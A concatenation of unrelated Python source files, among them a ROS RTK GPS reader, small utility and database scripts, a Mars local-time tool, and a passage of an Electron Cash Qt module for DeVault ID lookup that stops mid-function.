# sci_obj = mn.models.ScienceObject.objects.get(pid__did=obsoletes_pid)
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=pid)
# while sci_obj.obsoleted_by:
# obsoleted_by_pid = sysmeta_pyxb.obsoleted_by.value()
# chain_pid_list.append(obsoleted_by_pid)
# sci_obj = mn.models.ScienceObject.objects.get(pid__did=obsoleted_by_pid)
# return chain_pid_list
|
#!/usr/bin/env python
import math
import rospy
from serial_buffer import SerialBuffer as SerialBuffer
from gps_common.msg import GPSFix, GPSStatus
from std_srvs.srv import Trigger, TriggerResponse
def to_float(s):
try:
val = float(s)
except ValueError:
val = float('nan')
return val
def to_int(s):
try:
val = int(s)
except ValueError:
val = -1
return val
class GPSReader:
def __init__(self, device="/dev/ttyUSB0", baudrate=115200):
self.sb = SerialBuffer(device, baudrate)
if not self.sb.is_open():
print "Cannot open port"
exit()
self.reset_srv = rospy.Service('rtk_gps/reset', Trigger, self.reset_callback)
self.pub = rospy.Publisher('/rtk_gps/gps', GPSFix)
self.msg = GPSFix()
def spin_once(self):
serial_msg = self.sb.spin_once()
if serial_msg:
try:
self.process(serial_msg)
except Exception as e:
pass
def reset_callback(self, req):
print 'Reset'
return TriggerResponse(True, 'Reset')
def process(self, msg):
if msg[0] == '$PTNL':
if len(msg) == 13:
# mm.northing = float(msg[4])
# mm.easting = float(msg[6])
self.msg.err_vert = to_float(msg[4])
self.msg.err_horz = to_float(msg[6])
self.msg.altitude = to_float(msg[11][3:])
quality = to_int(msg[8])
self.msg.status.status = {0: GPSStatus.STATUS_NO_FIX,
1: GPSStatus.STATUS_FIX,
2: GPSStatus.STATUS_FIX,
3: GPSStatus.STATUS_DGPS_FIX}[quality]
self.msg.status.satellites_used = to_int(msg[9])
self.msg.gdop = to_float(msg[10])
else:
rospy.logerr('Wrong number of $PTNL message: 13 expected but %d given', len(msg))
return
elif msg[0] == '$PSAT':
if len(msg) != 7:
rospy.logerr('Wrong number of $PSAT message: 7 expected but %d given', len(msg))
return
self.msg.track = to_float(msg[3]) / 180.0 * math.pi
self.msg.pitch = to_float(msg[4]) / 180.0 * math.pi
self.msg.roll = to_float(msg[5]) / 180.0 * math.pi
elif msg[0] == '$GPRMC':
if len(msg) != 14:
rospy.logerr('Wrong number of $GPRMC message: 14 expected but %d given', len(msg))
return
if msg[2] == 'V':
self.msg.status.status = GPSStatus.STATUS_NO_FIX
else:
latitude = (to_float(msg[3]) if msg[4] == 'N' else -to_float(msg[3]))
self.msg.latitude = latitude // 100 + (latitude % 100) / 60
longitude = (to_float(msg[5]) if msg[6] == 'E' else -to_float(msg[5]))
self.msg.longitude = longitude // 100 + (longitude % 100) / 60
self.msg.speed = to_float(msg[7])
self.msg.track = to_float(msg[8])
if msg[12] == 'D':
self.msg.status.status = GPSStatus.STATUS_DGPS_FIX
elif msg[0] == '$GPGGA':
if len(msg) != 15:
rospy.logerr('Wrong number of $PSAT message: 15 expected but %d given', len(msg))
return
latitude = (to_float(msg[2]) if msg[3] == 'N' else -to_float(msg[2]))
self.msg.latitude = latitude // 100 + (latitude % 100) / 60
longitude = (to_float(msg[4]) if msg[5] == 'E' else -to_float(msg[4]))
self.msg.longitude = longitude // 100 + (longitude % 100) / 60
self.publish()
elif msg[0] == '$GPTRA':
pass
else:
rospy.logwarn('Unknown msg:' + str(msg))
return
def publish(self):
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
if __name__ == "__main__":
rospy.init_node('rtk_gps')
device = rospy.get_param("~device", "/dev/ttyUSB0")
reader = GPSReader(device)
while not rospy.is_shutdown():
reader.spin_once()
|
import os
def get_folder_size(dir_path):
"""
Computes folder size (all files and-subfolders size)
:param dir_path: path of the folder
:return: total size of the folder
:rtype int
"""
total_size = 0
d = os.scandir(dir_path)
for entry in d:
try:
if entry.is_dir():
total_size += get_folder_size(entry.path)
else:
total_size += entry.stat().st_size
except FileNotFoundError:
# file was deleted during scan
pass
return total_size
def sanitize_filename(filename):
"""
Removes illegal characters from a string in order to obtain
a valid file name
:param filename: non-sanitized filename
:return: sanitized filename
:rtype: str
"""
keep_characters = (' ', '.', '_')
return "".join(c for c in filename if c.isalnum() or c in keep_characters).rstrip()
|
import hashlib
from typing import Optional
import time
from datetime import datetime
from flask import json
import pymongo
from . connect2db import TIME_RECORDER_DB as DB
class Activity():
def __init__(self, name:str, description:str=""):
self._id:Optional[str] = None
self.name:str = name
self.description:str = description
now = datetime.now()
self.date:str = now.strftime("%Y-%m-%d")
self.beginning:str = now.strftime("%H:%M")
self.end:Optional[str] = None
self.total:Optional[str] = None
self.total_hours:float = -1
@staticmethod
def id(created_at):
id_fields = {"created_at": created_at}
serialized = json.dumps(id_fields, separators=(",", ":"), sort_keys=True, ensure_ascii=False)
return hashlib.sha1(serialized.encode("utf-8")).hexdigest()
@staticmethod
def find_by_date(date:str):
query = { "date": date }
cursor = DB.activity.find(query)
return list(cursor)
@staticmethod
def find_last_of_date(date:str):
query = { "date": date }
cursor = DB.activity.find(query).sort([("created_at", pymongo.DESCENDING)])
return next(cursor, None)
@staticmethod
def update_activity(activity_id, update_fields):
query = {
"_id": activity_id
}
update_doc = {
"$set": update_fields
}
update_result = DB.activity.find_one_and_update(query, update_doc, return_document=pymongo.ReturnDocument.AFTER)
return update_result
def save(self):
self.created_at = time.time()
self._id = Activity.id(self.created_at)
DB.activity.insert_one(vars(self))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 20 20:30:36 2019
@author : greg
@purpose : tribial program to be executed with shell script marsnow to print
the LMST date of 'now'
No argument needed
"""
from MarsTimeConverter import MarsTimeConverter
from pathlib import Path
import os, sys
import getopt
def main(argv):
try:
MARSCONVERTER = os.environ["MARSCONVERTER"]
except KeyError:
MARSCONVERTER = ""
landerconfigfile = MARSCONVERTER+"/"+'./landerconfig.xml'
my_file = Path(landerconfigfile)
try:
opts, args = getopt.getopt(argv,"ho:",["help","option="])
except getopt.GetoptError:
print ('python marsnow.py -opt <option> ')
print ('python marsnow.py -h for help')
sys.exit(2)
option = None
for opt, arg in opts:
if opt == '-h':
print ('python marsnow.py -o <option> \n'\
' function to get LMST now with various formats.\n\n'\
' @author: Greg Sainton (sainton@ipgp.fr)\n'\
' @version:1.1 (jan 20)\n\n'\
' -o --option <option> to return the sol \n'\
' if <option> = date -> return the date and time\n'\
' if <option> = sol -> return the sol number '\
)
sys.exit()
elif opt in ["--option", "--opt", "-o"]:
option = str(arg)
else:
option = None
if my_file.is_file():
mDate = MarsTimeConverter(landerconfigfile)
else:
sys.exit("landerconfigfile is missing")
marsDateNow = mDate.get_utc_2_lmst()
posT = marsDateNow.find('T')
if option is not None:
if option.lower() == "sol":
print(int(marsDateNow[0:posT]))
elif option.lower() == "date":
print(marsDateNow)
else:
print("Today, it is ", marsDateNow)
print("SOL ",marsDateNow[:posT] ,"from ", \
str(mDate.get_lmst_to_utc(lmst_date=int(marsDateNow[:posT]))), \
" UTC to ", str(mDate.get_lmst_to_utc(lmst_date=(int(marsDateNow[:posT])+1))))
if __name__ == '__main__':
main(sys.argv[1:])
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 11:24:12 2020
@author: ihousman
"""
import ee,datetime
ee.Initialize()
def getDate(m):return datetime.datetime.fromtimestamp(float(m)/1000).strftime('%Y-%m-%d')
date = '2020-06-04'
######################################
x = ee.data.getTaskList()
ids = [i['description'] for i in x if i['description'].find('TDD_') > -1 and i['state'] == 'CANCELLED' and getDate(i['creation_timestamp_ms']) == date]
print(ids)
print(len(ids))
|
rows1, cols1 = [int(i) for i in raw_input().split()]
matrix1 = [[0]*cols1]*rows1
for i in xrange(rows1):
matrix1[i] = [int(r) for r in raw_input().split()]
rows2, cols2 = [int(i) for i in raw_input().split()]
matrix2 = [[0]*cols2]*rows2
for i in xrange(rows2):
matrix2[i] = [int(r) for r in raw_input().split()]
if cols1 == rows2:
mr = [[0 for i in xrange(cols2)] for j in xrange(rows1)]
for i in xrange(rows1):
for j in xrange(cols2):
for k in xrange(cols1):
mr[i][j] += matrix1[i][k] * matrix2[k][j]
mr[i][j] = str(mr[i][j])
for row in mr:
print " ".join(row)
else:
print "The matrices can not be multiplied"
|
#!/usr/bin/python
import time
print(int(time.time()))
print(time.time())
|
import sqlite3
from connections_db.connections_cryptocurrencies import ConnectionDBCryptoCurrencies
dbTickers = sqlite3.connect("database/tickers.db")
dbTickers.execute("create table dataStock(nome text, logo text, info text, ticker text, dy number, precoMinimoCotaEmUmAno number, precoMaximoCotaEmUmAno number, dividendoEmUmAno number, oscilacaoCota number, valorCota number ,linkSiteRi text, valorizacaoCotaUmAno number, cnpj text);")
dbTickers.commit()
ConnectionDBCryptoCurrencies().createTable()
|
##!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Electron Cash - A Bitcoin Cash SPV Wallet
# This file Copyright (c) 2019 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
DeVault IDs related classes and functions - Qt UI related.
'''
# TODO: whittle these * imports down to what we actually use
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrcodewidget import QRCodeWidget
import queue
import time
import requests
from typing import Tuple, List, Callable
from enum import IntEnum
from electroncash import cashacct
from electroncash import util
from electroncash import web
from electroncash.address import Address, UnknownAddress
from electroncash.i18n import _, ngettext
from electroncash.wallet import Abstract_Wallet
class VerifyingDialog(WaitingDialog):
def __init__(self, parent, message, task, on_success=None, on_error=None, auto_cleanup=True,
*, auto_show=True, auto_exec=False, title=None, disable_escape_key=False):
super().__init__(parent, message, task, on_success=on_success,
on_error=on_error, auto_cleanup=auto_cleanup,
auto_show=False, auto_exec=False,
title=title or _('Verifying DeVault ID'),
disable_escape_key=disable_escape_key)
hbox = QHBoxLayout()
self._vbox.removeWidget(self._label)
icon_lbl = QLabel()
icon_lbl.setPixmap(QIcon(":icons/cashacct-logo.png").pixmap(50))
hbox.addWidget(icon_lbl)
hbox.addWidget(self._label)
self._vbox.addLayout(hbox)
prog = QProgressBar()
prog.setRange(0,0)
self._vbox.addWidget(prog)
if auto_show and not auto_exec:
self.open()
elif auto_exec:
self.exec_()
destroyed_print_error(self)
def verify_multiple_blocks(blocks : List[int], parent : MessageBoxMixin, wallet : Abstract_Wallet, timeout=10.0) -> int:
''' Pass a list of blocks and will attempt to verify them all in 1 pass.
This is used by the Contacts tab to verify unverified DeVault IDs that
may have been imported. Returns the number of successfully verified blocks
or None on user cancel. '''
if not len(blocks):
return 0
blocks = set(blocks)
nblocks = len(blocks)
q = queue.Queue()
def done_cb(thing):
if isinstance(thing, cashacct.ProcessedBlock) and thing.reg_txs:
q.put(thing)
else:
q.put(None)
ctr = 0
def thread_func():
nonlocal ctr
for number in blocks:
wallet.cashacct.verify_block_asynch(number, success_cb=done_cb, error_cb=done_cb, timeout=timeout)
errs = 0
while ctr + errs < nblocks:
try:
thing = q.get(timeout=timeout)
if thing is None:
errs += 1
else:
ctr += 1
except queue.Empty:
return
code = VerifyingDialog(parent.top_level_window(),
ngettext("Verifying {count} block please wait ...",
"Verifying {count} blocks please wait ...", nblocks).format(count=nblocks),
thread_func, auto_show=False, on_error=lambda e: parent.show_error(str(e))).exec_()
if code != QDialog.Accepted:
return None
return ctr
def resolve_cashacct(parent : MessageBoxMixin, name : str, wallet : Abstract_Wallet = None) -> Tuple[cashacct.Info, str]:
''' Throws up a WaitingDialog while it resolves a DeVault ID.
Goes out to network, verifies all tx's.
Returns: a tuple of: (Info, Minimally_Encoded_Formatted_AccountName)
Argument `name` should be a DeVault ID name string of the form:
name#number.123
name#number
name#number.; etc
If the result would be ambigious, that is considered an error, so enough
of the account name#number.collision_hash needs to be specified to
unambiguously resolve the DeVault ID.
On failure throws up an error window and returns None.'''
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
class Bad(Exception): pass
try:
if not wallet.network or not wallet.network.interface:
raise Bad(_("Cannot verify DeVault ID as the network appears to be offline."))
ca_tup = wallet.cashacct.parse_string(name)
if not ca_tup:
raise Bad(_("Invalid DeVault ID name specified: {name}").format(name=name))
results = None
def resolve_verify():
nonlocal results
results = wallet.cashacct.resolve_verify(name)
code = VerifyingDialog(parent.top_level_window(),
_("Verifying DeVault ID {name} please wait ...").format(name=name),
resolve_verify, on_error=lambda e: parent.show_error(str(e)), auto_show=False).exec_()
if code == QDialog.Rejected:
# user cancel operation
return
if not results:
raise Bad(_("DeVault ID not found: {name}").format(name=name) + "\n\n"
+ _("Could not find the DeVault ID name specified. "
"It either does not exist or there may have been a network connectivity error. "
"Please double-check it and try again."))
if len(results) > 1:
tup = multiple_result_picker(parent=parent, wallet=wallet, results=results)
if not tup:
# user cancel
return
results = [tup]
info, mch = results[0]
name = wallet.cashacct.fmt_info(info, mch)
if not isinstance(info.address, Address):
raise Bad(_("Unsupported payment data type.") + "\n\n"
+ _("The DeVault ID {name} uses an account type that "
"is not supported by Electron Cash.").format(name=name))
return info, name
except Bad as e:
parent.show_error(str(e))
return None
class ButtonAssociatedLabel(QLabel):
''' A QLabel, that if clicked on, sends a 'click()' call to an associated
QAbstractButton. '''
def __init__(self, *args, **kwargs):
but = kwargs.pop('button', None)
super().__init__(*args, **kwargs)
self.but = but
self.setTextInteractionFlags(self.textInteractionFlags() | Qt.TextSelectableByMouse)
def setButton(self, b : QAbstractButton): self.but = b
def button(self) -> QAbstractButton: return self.but
def mouseReleaseEvent(self, e):
super().mouseReleaseEvent(e)
if self.but:
if self.but.isEnabled():
self.but.click()
elif self.but.toolTip() and not self.hasSelectedText():
QToolTip.showText(QCursor.pos(), self.but.toolTip(), self)
def naked_button_style() -> str:
''' Returns a stylesheet for a small 'naked' (flat) QPushButton button which
is used in the lookup results and other associated widgets in this file '''
but_style_sheet = 'QPushButton { border-width: 1px; padding: 0px; margin: 0px; }'
if not ColorScheme.dark_scheme:
but_style_sheet += ''' QPushButton { border: 1px solid transparent; }
QPushButton:hover { border: 1px solid #3daee9; }'''
return but_style_sheet
def button_make_naked(but: QAbstractButton) -> QAbstractButton:
''' Just applied a bunch of things to a button to "make it naked"
which is the look we use for the lookup results and various other odds and
ends. Returns the button passed to it. '''
but.setStyleSheet(naked_button_style())
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
return but
class InfoGroupBox(PrintError, QGroupBox):
class ButtonType(IntEnum):
NoButton = 0 # If this is specified to button_type, then the buttons will be hidden. selectedItem and selectedItems will have undefined results.
Radio = 1 # If specified, the on-screen buttons will be QRadioButtons and selectedItems() will always have 0 or 1 item.
CheckBox = 2 # If specified, the on-screen buttons will be QCheckBox and selectedItems() may be a list of more than 1 result
def __init__(self,
parent : QWidget, # widget parent for layout/embedding/etc
main_window : MessageBoxMixin, # may be same as 'parent'; will raise if not an ElectrumWindow instance
items: List[Tuple[cashacct.Info, str, str]] = [], # list of 2 or 3 tuple : Info, minimal_chash[, formatted_string]
title : str = None,
button_type : ButtonType = ButtonType.Radio, # Note that if CheckBox, the buttonGroup will be made non-exclusive and selectedItems() may return more than 1 item.
extra_buttons : List[Callable[[Tuple[cashacct.Info, str, str]], QAbstractButton]] = [], # pass a list of callables that take a 3-tuple for each item and return a button
show_addresses : bool = True, # if False, the address label remains hidden
custom_contents_margins : Tuple[int] = None, # if specified, use this as the contents margins for the internal layout widget
):
from .main_window import ElectrumWindow
assert isinstance(main_window, ElectrumWindow)
super().__init__(parent)
self.main_window = main_window
self.wallet = self.main_window.wallet
self.extra_buttons = extra_buttons or []
self.show_addresses = bool(show_addresses)
if isinstance(custom_contents_margins, (tuple, list)) and len(custom_contents_margins) == 4 and all(isinstance(x, (int, float)) for x in custom_contents_margins):
self.custom_contents_margins = custom_contents_margins
else:
self.custom_contents_margins = None
assert isinstance(self.wallet, Abstract_Wallet)
self._setup()
self.setItems(items=items, title=title, auto_resize_parent=False, button_type=button_type)
def _setup(self):
self.w = QWidget(self)
self.vbox = QVBoxLayout(self)
self.vbox.setContentsMargins(0,0,0,0)
self.vbox.addWidget(self.w)
self._but_grp = QButtonGroup(self) # client code shouldn't use this but instead use selectedItems(), etc
self.no_items_text = _('No DeVault IDs') # client code may set this directly
def setItems(self,
items : List[Tuple[cashacct.Info, str, str]], # list of 2 or 3 tuple : Info, minimal_chash[, formatted_string]
title = None, auto_resize_parent = True, sort=True,
button_type : ButtonType = ButtonType.Radio):
items = items or []
nitems = len(items)
title = ngettext("{number} DeVault ID", "{number} DeVault IDs", nitems).format(number=nitems) if title is None else title
wallet = self.wallet
if items and (sort or len(items[0]) != 3):
# sort items by formatted cash account string, also adding the string to
# the items tuples; tuples now are modified to 3 elements:
# (info, min_chash, formatted_ca_string)
formatter = lambda x: (x[0], x[1], wallet.cashacct.fmt_info(x[0], x[1]))
if sort:
items = sorted((formatter(x) for x in items), key=lambda tup:tup[2])
else:
items = [formatter(x) for x in items]
self._items = items
self.button_type = button_type
self.setTitle(title)
self.refresh()
if auto_resize_parent and self.parent():
weakParent = util.Weak.ref(self.parent())
QTimer.singleShot(0, lambda: weakParent() and weakParent().resize(weakParent().sizeHint()))
def buttonGroup(self) -> QButtonGroup:
''' The button group id's will point to indices in self.items() '''
return self._but_grp
def checkItemWithInfo(self, info : cashacct.Info):
''' Pass an info object and the item that corresponds to that
Info object will be checked. Pass None to uncheck all items. '''
for i, item in enumerate(self._items):
if info is None:
self._but_grp.button(i).setChecked(False)
elif item[0] == info:
self._but_grp.button(i).setChecked(True)
def items(self) -> List[Tuple[cashacct.Info, str, str]]:
''' The list of items on-screen. self.buttonGroup()'s ids will point
to indices in this list.
Returned list items are 3-tuples of:
(Info, min_chash: str, fmtd_acct_name: str) '''
return self._items
def selectedItem(self) -> Tuple[cashacct.Info, str, str]:
''' Returns the currently selected item tuple or None if none is selected '''
items = self.selectedItems()
if items:
return items[0]
def selectedItems(self) -> List[Tuple[cashacct.Info, str, str]]:
''' In multi-select mode (CheckBox mode), returns the currently selected
items as a list of 3-tuple. '''
ret = []
buts = self._but_grp.buttons()
for but in buts:
if but.isChecked():
which = self._but_grp.id(but)
if which > -1 and which < len(self._items):
ret.append(self._items[which])
return ret
def refresh(self):
from .main_window import ElectrumWindow
parent = self.main_window
wallet = self.wallet
items = self._items
button_type = self.button_type
assert all(len(x) == 3 for x in items)
but_grp = self._but_grp
cols, col, row = 2, 0, -1
if self.w:
# save selection
saved_selection = [tup[0] for tup in self.selectedItems()]
# tear down the dummy container widget from before and everything
# in it
for c in self.findChildren(QAbstractButton, "InfoGroupBoxButton"):
if isinstance(c, QAbstractButton):
but_grp.removeButton(c)
self.w.hide()
self.vbox.removeWidget(self.w)
self.w.setParent(None)
self.w.deleteLater()
self.w = None
self.w = w = QWidget(self)
self.vbox.addWidget(w)
grid = QGridLayout(w)
if self.custom_contents_margins:
grid.setContentsMargins(*self.custom_contents_margins)
def view_tx_link_activated(txid):
if isinstance(parent, ElectrumWindow):
parent.do_process_from_txid(txid=txid, tx_desc=wallet.get_label(txid))
def view_addr_link_activated(addr):
if isinstance(parent, ElectrumWindow):
try:
address = Address.from_string(addr)
parent.show_address(address, parent=parent.top_level_window())
except Exception as e:
parent.print_error(repr(e))
# We do it this way with BUTTON_FACTORY in case we want to expand
# this facility later to generate even more dynamic buttons.
if button_type == __class__.ButtonType.CheckBox:
BUTTON_FACTORY = lambda *args: QCheckBox()
but_grp.setExclusive(False)
else:
BUTTON_FACTORY = lambda *args: QRadioButton()
but_grp.setExclusive(True)
hide_but = button_type == __class__.ButtonType.NoButton
grid.setVerticalSpacing(4)
if not items:
label = WWLabel("<i>" + self.no_items_text + "</i>")
label.setAlignment(Qt.AlignCenter)
grid.addWidget(label, 0, 0, -1, -1)
for i, item in enumerate(items):
col = col % cols
if not col:
row += 1
info, min_chash, ca_string = item
ca_string_em = f"{ca_string} {info.emoji}"
# Radio button (by itself in colum 0)
rb = BUTTON_FACTORY(info, min_chash, ca_string, ca_string_em)
rb.setObjectName("InfoGroupBoxButton")
rb.setHidden(hide_but)
rb.setDisabled(hide_but) # hidden buttons also disabled to prevent user clicking their labels to select them
is_valid = True
is_mine = False
is_change = False
if not isinstance(info.address, Address):
rb.setDisabled(True)
is_valid = False
rb.setToolTip(_('Electron Cash currently only supports DeVault ID types 1 & 2'))
elif wallet.is_mine(info.address):
is_mine = True
is_change = wallet.is_change(info.address)
but_grp.addButton(rb, i)
grid.addWidget(rb, row*3, col*5, 1, 1)
pretty_string = info.emoji + " " + ca_string[:-1]
chash_extra = info.collision_hash[len(min_chash):]
if not min_chash:
chash_extra = "." + chash_extra
# DeVault ID name
ca_lbl = ButtonAssociatedLabel(f'<b>{pretty_string}</b><font size=-1><i>{chash_extra}</i></font><b>;</b>', button=rb)
grid.addWidget(ca_lbl, row*3, col*5+1, 1, 1)
# View tx ...
viewtx = _("View tx")
view_tx_lbl = WWLabel(f'<font size=-1><a href="{info.txid}">{viewtx}...</a></font>')
grid.addWidget(view_tx_lbl, row*3, col*5+2, 1, 1)
view_tx_lbl.setToolTip(_("View Registration Transaction"))
# misc buttons
hbox = QHBoxLayout()
hbox.setContentsMargins(0,0,0,0)
hbox.setSpacing(4)
for func in self.extra_buttons:
if callable(func):
ab = func(item)
if isinstance(ab, QAbstractButton):
button_make_naked(ab)
hbox.addWidget(ab)
# copy button
copy_but = QPushButton(QIcon(":icons/copy.png"), "")
button_make_naked(copy_but)
hbox.addWidget(copy_but)
grid.addLayout(hbox, row*3, col*5+3, 1, 1)
# end button bar
if isinstance(parent, ElectrumWindow):
view_tx_lbl.linkActivated.connect(view_tx_link_activated)
copy_but.clicked.connect(lambda ignored=None, ca_string_em=ca_string_em, copy_but=copy_but:
parent.copy_to_clipboard(text=ca_string_em, tooltip=_('DeVault ID copied to clipboard'), widget=copy_but) )
copy_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{cash_account_name}</b>").format(cash_account_name=ca_string_em)
+ '</span>')
else:
view_tx_lbl.setHidden(True)
copy_but.setHidden(True)
if self.show_addresses:
addr_lbl = ButtonAssociatedLabel('', button=rb)
if is_valid:
if is_mine:
addr_lbl.setText(f'<a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a>')
addr_lbl.linkActivated.connect(view_addr_link_activated)
addr_lbl.setToolTip(_('Wallet') + ' - ' + (_('Change Address') if is_change else _('Receiving Address')))
addr_lbl.setButton(None) # disable click to select
else:
addr_lbl.setText(f'<pre>{info.address.to_ui_string()}</pre>')
else:
addr_lbl.setText('<i>' + _('Unsupported Account Type') + '</i>')
addr_lbl.setToolTip(rb.toolTip())
grid.addWidget(addr_lbl, row*3+1, col*5+1, 1, 3)
if (col % cols) == 0:
# insert stretch in between the two columns
spacer = QSpacerItem(1,0)
grid.addItem(spacer, row, col*5+4, 1, 1)
grid.setColumnStretch(col*5+4, 10)
if self.show_addresses:
# in-between row spaer. Only added if showing addresses
# to make the address line visually closer to the line above it
spacer = QSpacerItem(1, 8)
grid.addItem(spacer, row*3+2, col*5, 1, 4)
col += 1
if len(items) == 1:
# just 1 item, put it on the left
grid.addItem(QSpacerItem(2,1), 0, 5)
grid.setColumnStretch(5, 100)
if len(items) <= 2:
# just 1 row, push it up to the top
grid.addItem(QSpacerItem(1,2), 3, 0, -1, -1)
grid.setRowStretch(3, 100)
if saved_selection and self.button_type != self.ButtonType.NoButton:
for info in saved_selection:
self.checkItemWithInfo(info)
else:
self.checkItemWithInfo(None)
def multiple_result_picker(parent, results, wallet=None, msg=None, title=None, gbtext=None):
''' Pops up a modal dialog telling you to pick a results. Used by the
Contacts tab edit function, etc. '''
assert parent
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
msg = msg or _('Multiple results were found, please select an option from the items below:')
title = title or _("Select DeVault ID")
d = WindowModalDialog(parent, title)
util.finalization_print_error(d) # track object lifecycle
destroyed_print_error(d)
vbox = QVBoxLayout(d)
lbl = WWLabel(msg)
vbox.addWidget(lbl)
gb = InfoGroupBox(d, parent, results)
vbox.addWidget(gb)
ok_but = OkButton(d)
buts = Buttons(CancelButton(d), ok_but)
vbox.addLayout(buts)
ok_but.setEnabled(False)
but_grp = gb.buttonGroup()
but_grp.buttonClicked.connect(lambda x=None: ok_but.setEnabled(gb.selectedItem() is not None))
code = d.exec_()
if code == QDialog.Accepted:
item = gb.selectedItem()
if item:
return item[:-1]
def lookup_cash_account_dialog(
parent, wallet, *, # parent and wallet are required and parent must be an ElectrumWindow instance.
title: str = None, # the title to use, defaults to "Lookup DeVault ID" (translated) and is bold and larger. Can be rich text.
blurb: str = None, # will appear in the same label, can be rich text, will get concatenated to title.
title_label_link_activated_slot: Callable[[str], None] = None, # if you embed links in the blub, pass a callback to handle them
button_type: InfoGroupBox.ButtonType = InfoGroupBox.ButtonType.NoButton, # see InfoGroupBox
add_to_contacts_button: bool = False, # if true, the button bar will include an add to contacts button
pay_to_button: bool = False # if true, the button bar will include a "pay to" button
) -> List[Tuple[cashacct.Info, str, str]]: # Returns a list of tuples
''' Shows the generic DeVault ID lookup interface. '''
from .main_window import ElectrumWindow
ok_disables = button_type != InfoGroupBox.ButtonType.NoButton
title = title or _("Lookup DeVault ID")
blurb = blurb or ''
assert isinstance(parent, ElectrumWindow) and isinstance(wallet, Abstract_Wallet)
if parent.gui_object.warn_if_no_network(parent):
return None
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
all_cashacct_contacts = set(contact.name for contact in wallet.contacts.get_all(nocopy=True) if contact.type == 'cashacct')
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
label = QLabel()
label.setPixmap(QIcon(":icons/cashacct-logo.png").pixmap(50))
hbox.addWidget(label)
hbox.addItem(QSpacerItem(10, 1))
label = QLabel("<font size=+1><b>" + title + "</b></font>" + blurb)
if callable(title_label_link_activated_slot):
label.linkActivated.connect(title_label_link_activated_slot)
label.setAlignment(Qt.AlignVCenter|Qt.AlignLeft)
hbox.addWidget(label)
hbox.addStretch(2)
vbox.addLayout(hbox)
grid = QGridLayout()
grid.setContentsMargins(62, 32, 12, 12)
acct = QLineEdit()
acct.setPlaceholderText(_("DeVault ID e.g. satoshi#123.45"))
acct.setMinimumWidth(280)
label2 = WWLabel('<a href="https://www.devaultid.com/#lookup">' + _("Search online...") + "</a>")
label2.linkActivated.connect(webopen)
#acct.setFixedWidth(280)
label = HelpLabel(_("&DeVault ID Name"), _("Enter a DeVault ID name of the form Name#123.45, and Electron Cash will search for the contact and present you with its resolved address."))
label.setBuddy(acct)
search = QPushButton(_("Lookup"))
search.setEnabled(False)
grid.addWidget(label, 0, 0, 1, 1, Qt.AlignRight)
grid.addWidget(acct, 0, 1, 1, 1, Qt.AlignLeft)
grid.addWidget(search, 0, 2, 1, 1, Qt.AlignLeft)
grid.addWidget(label2, 0, 3, 1, 1, Qt.AlignLeft)
grid.setColumnStretch(3, 5)
vbox.addLayout(grid)
vbox.addItem(QSpacerItem(20,10))
frame = QScrollArea()
tit_lbl = QLabel()
vbox.addWidget(tit_lbl)
extra_buttons = []
# Extra Buttons
if add_to_contacts_button:
def create_add_to_contacts_button_callback(item: tuple) -> QPushButton:
info, min_chash, ca_string = item
ca_string_em = wallet.cashacct.fmt_info(info, min_chash, emoji=True)
but = QPushButton(QIcon(":icons/tab_contacts.png"), "")
if isinstance(info.address, Address):
if ca_string in all_cashacct_contacts or wallet.is_mine(info.address):
but.setDisabled(True)
but.setToolTip(_('<span style="white-space:nowrap"><b>{cash_account}</b> already in Contacts</span>').format(cash_account=ca_string_em))
else:
add_str = _("Add to Contacts")
but.setToolTip(f'<span style="white-space:nowrap">{add_str}<br> <b>{ca_string_em}</b></span>')
del add_str
def add_contact_slot(ign=None, but=but, item=item):
# label, address, typ='address') -> str:
new_contact = parent.set_contact(label=ca_string, address=info.address, typ='cashacct')
if new_contact:
msg = _('<span style="white-space:nowrap"><b>{cash_account}</b> added to Contacts</span>').format(cash_account=ca_string_em)
but.setDisabled(True)
but.setToolTip(msg)
all_cashacct_contacts.add(new_contact.name)
else:
msg = _("Error occurred adding to Contacts")
QToolTip.showText(QCursor.pos(), msg, frame, QRect(), 5000)
# /add_contact
but.clicked.connect(add_contact_slot)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_add_to_contacts_button_callback)
if pay_to_button:
def create_payto_but(item):
info, min_chash, ca_string = item
ca_string_em = wallet.cashacct.fmt_info(info, min_chash, emoji=True)
